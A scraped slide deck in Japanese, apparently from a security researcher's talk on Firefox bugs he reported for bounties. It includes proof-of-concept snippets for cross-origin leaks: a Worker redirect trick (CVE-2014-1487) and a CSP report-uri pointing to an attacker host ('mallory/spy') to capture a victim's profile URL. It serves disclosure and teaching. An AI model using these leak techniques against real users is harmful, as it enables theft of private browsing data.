Más contenido relacionado Más de Muneaki Nishimura (13) Firefoxの倒し方2. 61,500ドル (約740万円)
Bug 1065909 Bug 1109276 Bug 1162018 Bug 1196740
Bug 1069762 Bug 1148328 Bug 1162411 Bug 1198078
Bug 1080987 Bug 1149094 Bug 1164397 Bug 1207556
Bug 1101158 Bug 1157216 Bug 1190038 Bug 1208520
Bug 1102204 Bug 1158715 Bug 1190139 Bug 1208956
Bug 1106713 Bug 1160069 Bug 1192595
私の1年間の実績
11. Fetch APIに課せられた仕様上の制限
fetch( 'http://api.example.jp/path', {
method: 'POST',
headers: {
'Content-Type' : 'text/plain'
},
body: 'Hello World'
}).then(function(res) {
console.log(res.headers.get( 'Content-Type' ));
})
TRACEなどは指定禁止
HostやCookieなどは指定禁止
GETやHEADメソッドのときは指定禁止
Set-Cookieなどは指定禁止
24. CVE-2014-1487 by Masato Kinugawa
window.onerror = function( e ) { alert( e ); }
new Worker('redirect?to=https://www.facebook.com/profile.php');
他のサイトをワーカースクリプト
として読み込む
25. window.onerror = function( e ) { alert( e ); }
new Worker('redirect?to=https://www.facebook.com/profile.php');
CVE-2014-1487 by Masato Kinugawa
28. 以下のページをユーザに開かせると
// HTTP Response Header
Content-Security-Policy-Report-Only "frame-src 'none';
report-uri http://mallory/spy;"
// Exploit HTML
<iframe src="https://www.facebook.com/profile.php">
29. 以下のデータが攻撃者に送信される
// HTTP Response Header
Content-Security-Policy-Report-Only "frame-src 'none';
report-uri http://mallory/spy;"
// Exploit HTML
<iframe src="https://www.facebook.com/profile.php">
33. Firefoxのアーキテクチャ
Thanks to Makoto Kato (Mozilla Japan)
https://docs.google.com/presentation/d/17KvlHVH2JsioGuPKCuBDayjK6WSJoTLfzgpiMG1SKpY
ネットワーク通信モジュール
DOM操作および各APIの実装
40. 脆弱性発生のメカニズム
Page
DOM / Web API
Network
(Necko)
http:とhttps:は
異なるオリジン
OEとhttps:は
TLSの実装を共有
http://twitter と https://twitter の
Session Ticket は分ける必要がある